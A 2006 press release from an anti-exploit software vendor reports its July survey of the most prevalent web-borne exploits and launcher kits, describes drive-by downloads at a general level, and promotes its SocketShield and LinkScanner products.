August 4, 2006; 07:34 AM
Exploit Prevention Labs (http://www.explabs.com), developer of anti-exploit software, today released findings
for its July 2006 Exploit Prevalence Survey™. Now in its third month,
the Exploit Prevalence Survey is the first monthly survey to measure
the top web-borne exploits based on real-world prevalence data. Results
are derived from automated reports submitted by users of Exploit
Prevention Labs’ SocketShield anti-exploit software, combined with
exploit distribution data captured from the company’s popular
LinkScanner service and network of automated hunting-pots.
July’s data shows an increase in the overall prevalence of exploits; of
particular note is the surge in Iframers Launcher Script use, taking it
to the number one position accounting for 26 percent of reported
exploits, up from the number three position in June with 16 percent.
The Iframers Launcher Script is produced and distributed by the St.
Petersburg, Russia-based cyber criminal organization known as the
CoolWebSearch (CWS) gang – the same group responsible for the
still-widespread WMF exploit that first appeared at the end of last
year.
According to Roger Thompson, CTO of Exploit
Prevention Labs and author of the Exploit Prevalence Survey, “Because
our Intelligence Network operates in real-time, we’re able to keep
track of the CWS gang’s activities, unlike the traditional safe surfing
and blacklisting services.”
The WebAttacker launcher
script, developed and sold by an underground software publisher also
based in Russia, remained strong at nearly 26 percent of reported
exploits, dropping slightly from its number one position in June when
it accounted for 32 percent of reports. WebAttacker remains popular
because it enables people with little technical knowledge to create and
distribute exploits using a simple point-and-click interface. Although
the developer issued an updated version of the script in July, most
likely to address bug fixes, it continues to distribute the same suite
of exploits as it did in June.
Incidences of the Windows
Metafile (WMF) exploit, which appeared and spread rapidly at the end of
2005, bounced back up to the number three position with 17 percent
prevalence in July from its number four position and 15 percent in
June.
Thompson urged users to redouble their patching
efforts. “Even though seven months have passed since Microsoft issued a
patch for the WMF vulnerability, WMF’s continued strong showing in our
surveys indicates that a significant number of users remain unpatched.”
The MDAC exploit continued to increase in prevalence, reaching 3.5
percent prevalence in July over 0.5 percent in June, although the
number is likely much higher, since the WebAttacker launcher script
also distributes the MDAC exploit.
Exploit Prevalence Results for the Month of July 2006
The following is a summary of the top five most-reported web exploits for the month of July 2006:
Exploit Rank Percent of Description
last Overall
month Occurrences
Iframers 3 26.11 percent Propagated by a cybercrime
launcher organization sometimes called the
script CoolWebSearch gang, or the Russian
iframers, this exploit is perpetrated
by a cybercrime mob generally thought
to be based in St. Petersburg,
Russia. This organization is
responsible for the Circuit City hack
in early June 2006. Using a simple
HTML tag called an iframe embedded on
a hacked web site, the visitor's web
browser is redirected to an exploit
server operated by the gang, which
attempts to deposit up to eight
different exploits onto the user's
computer.
WebAttacker 1 26.00 percent WebAttacker is a Russian-built
software application, first
introduced about 18 months ago, which
currently launches four different
exploits, including MDAC, a Firefox
exploit, CreateTextRange, and an
exploit for the Java Virtual Machine.
Like a commercial software
application, it can be purchased
online -- but on underground hacker
web sites -- for between $20 and
$300, and requires minimal technical
sophistication to use. Updated every
few months, just like legitimate
commercial software, only it is
crimeware. Updated in July, most
likely for bug fixes.
WMF (CVE- 4 17.33 percent Windows Metafile exploit from
2005-2124) December 2005. Uses a little-known
with known feature of Windows Metafiles to
payload execute arbitrary code, including
malware. The exploit, a genuine
zero-day attack, was allegedly
purchased for $5,000 from a Russian
hacking group. Seven months after
Microsoft issued a patch, it's still
widely used by cybercriminals.
TriMode 5 11.12 percent A launcher script discovered by
Exploit Preventions Labs on May 23,
2006, TriMode is an encrypted script
that attempts to launch three
different exploits.
CreateTextRange 2 9.02 percent Released March 2006. This is a
(CVE-2006-1359) buffer overflow attack affecting
Internet Explorer that enables the
execution of arbitrary code, usually
a downloader -- a program whose job
is to download and install another
program such as a rootkit or a
keylogger. Patched in April by
Microsoft, this exploit appears to be
in decline.
NOTE: Numbers above do not add up to 100 percent, due to the following
less-frequently reported exploits: IE Script Action Overload
(4.57 percent), MDAC (3.51 percent), CHM (1.99) and Javascript window
(.35 percent).
What are Exploits?
Exploits are malware
applications that take advantage of security vulnerabilities in common
software applications such as Windows operating systems and browsers.
Unlike traditional malware, such as viruses or trojans that are usually
created by thrill-seeking individuals trying to cause chaos, exploits
are part of a growing category of malicious and frequently for-profit
applications used by international criminal cyber gangs.
Zero-day exploits, an especially dangerous form of exploit, are
exploits for which no patches are yet available. Once software
vulnerabilities are discovered, it typically takes the software
developer anywhere from three weeks to six months to develop a patch,
because the patches must be rigorously tested to ensure they don’t
cause other system instabilities. On the other hand, exploit developers
are not bothered by such concepts as quality assurance and application
conflicts, and can release their code very quickly, often the same day
a vulnerability is uncovered.
Most exploit infections
occur by what’s known as a drive-by download, in which malicious code
is force-downloaded onto a user’s computer without their knowledge.
This occurs the moment the user visits a compromised web site, which
may well appear completely innocuous. The payload, usually in the form
of a rootkit, then exposes the user to damage from spyware, keyloggers,
and other crimeware.
Many Internet users mistakenly believe as long
as they’re not visiting pornographic or illegal file sharing sites,
they’re safe from exploits. The truth, however, is that even trusted
web sites cannot always be trusted.
Similar to the business model employed by spammers, the exploit
distributors use a tiered distribution system, usually composed of a
single master exploit server that controls a large network of servers
hosting innocent-seeming web sites that in turn act as lures for
unsuspecting visitors. Exploit Prevention Labs has discovered numerous
exploit distribution networks in which up to 20,000 trusted and
legitimate web sites had been hacked by cyber criminals who were using
those sites to spread exploits.
When a surfer visits one
of the sites, malicious code placed on the site silently connects to an
exploit server operated by the criminals and attempts to deliver the
drive-by download onto the user’s machine. If the web surfer is using
an operating system or browser that is unpatched for the latest
vulnerabilities, their machine is infected.
About SocketShield
SocketShield is the industry’s first reliable solution to protect
Internet users against the growing threat of zero-day and other online
exploits that target vulnerabilities in unpatched Windows applications.
SocketShield provides a critical layer of security that complements the
defenses provided by traditional security solutions. Firewalls cannot
stop exploits, because exploits enter within the trusted communications
stream of the user’s browser connection. Anti-virus and anti-spyware
applications can’t protect against exploits because they must wait for
the malware code to hit the hard disk in order to detect it, and by
that time most exploits have already executed their payload. Patch
management systems can’t distribute a patch until the application
vendor releases it. And patching as a general practice, while critical,
often fails because it relies on users taking action of their own
volition.
Free Trials
Free trial downloads of SocketShield are available from Exploit Prevention Labs’ web site at http://www.explabs.com.
The product supports all 32- and 64-bit versions of Windows and
requires minimal computing resources to operate. At the conclusion of
the trial, users can purchase a license, including a one-year
subscription covering unlimited software updates and online technical
support, for $29.95. Volume discounts are available.
Exploit Prevention Labs also last month introduced LinkScanner, a free
real-time url scanner that tells users whether a site they intend to
visit has been poisoned by an exploit distribution network. LinkScanner
is available at http://linkscanner.explabs.com.
About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson
in 2005, Exploit Prevention Labs develops security software to protect
against Web-based exploits. SocketShield, the company’s flagship
product, provides patent-pending protection against zero-day exploits
during the critical risk window between the announcement of a
vulnerability and the provision of a patch by the vendor. Exploit
Prevention Labs also offers the free LinkScanner url checker, the first
produce developed from the company’s SocketShield Software Developers’
Kit (SDK). More information about Exploit Prevention Labs and
SocketShield may be found on the company’s website at http://www.explabs.com .